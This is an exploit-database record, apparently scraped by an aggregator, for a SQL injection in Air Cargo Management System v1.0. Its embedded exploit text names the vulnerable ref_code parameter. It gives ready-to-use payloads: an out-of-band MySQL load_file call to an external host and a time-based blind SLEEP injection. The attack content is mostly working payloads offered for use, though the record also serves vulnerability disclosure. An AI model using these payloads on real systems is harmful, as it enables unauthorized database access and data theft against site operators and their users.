Air Cargo Management System v1.0 - SQLi

2022-02-23T00:00:00

Description

{"id": "EDB-ID:50779", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Air Cargo Management System v1.0 - SQLi", "description": "", "published": "2022-02-23T00:00:00", "modified": "2022-02-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/50779", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-08-12T19:21:36", "viewCount": 121, "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "vulnersScore": 0.3}, "_state": {"dependencies": 1660332613, "score": 1660333757}, "_internal": {"score_hash": "aecac2e46bc845fcc407acbc1c27eba3"}, "sourceHref": "https://www.exploit-db.com/download/50779", "sourceData": "# Title: Air Cargo Management System v1.0 - SQLi\r\n# Author: nu11secur1ty\r\n# Date: 02.18.2022\r\n# Vendor: https://www.sourcecodester.com/users/tips23\r\n# Software: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\r\n# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Air-Cargo-Management-System\r\n\r\n# Description:\r\nThe `ref_code` parameter from Air Cargo Management System v1.0 appears\r\nto be vulnerable to SQL injection attacks.\r\nThe payload '+(select\r\nload_file('\\\\\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\\\hag'))+'\r\nwas submitted in the ref_code parameter.\r\nThis payload injects a SQL sub-query that calls MySQL's load_file\r\nfunction with a UNC file path that references a URL on an external\r\ndomain.\r\nThe application interacted with that domain, indicating that the\r\ninjected SQL query was executed.\r\nWARNING: If this is in some external domain, or some subdomain\r\nredirection, or internal whatever, this will be extremely dangerous!\r\nStatus: CRITICAL\r\n\r\n\r\n[+] Payloads:\r\n\r\n---\r\nParameter: ref_code (GET)\r\n Type: time-based blind\r\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\r\n Payload: p=trace&ref_code=258044'+(select\r\nload_file('\\\\\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\\\hag'))+''\r\nAND (SELECT 9012 FROM (SELECT(SLEEP(3)))xEdD) AND 'JVki'='JVki\r\n---", "osvdbidlist": [], "exploitType": "webapps", "verified": false}